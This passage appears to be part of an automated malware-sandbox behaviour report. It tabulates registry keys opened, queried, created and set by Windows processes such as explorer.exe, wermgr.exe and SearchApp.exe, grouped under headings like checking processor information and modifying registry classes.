| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\explorer.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\wermgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wermgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\wermgr.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\wermgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\wermgr.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3665033694-1447845302-680750983-1000\{76C49466-DA07-4439-80EE-9EA3E5CCA9AB} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3665033694-1447845302-680750983-1000\{F3053133-2A2F-46B7-9967-996889E948CF} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3665033694-1447845302-680750983-1000\{A2FB658B-7217-4070-9E7C-189BDB5EB4B0} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3665033694-1447845302-680750983-1000\{B21A3476-85DC-497A-933E-D264C818C2DC} | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
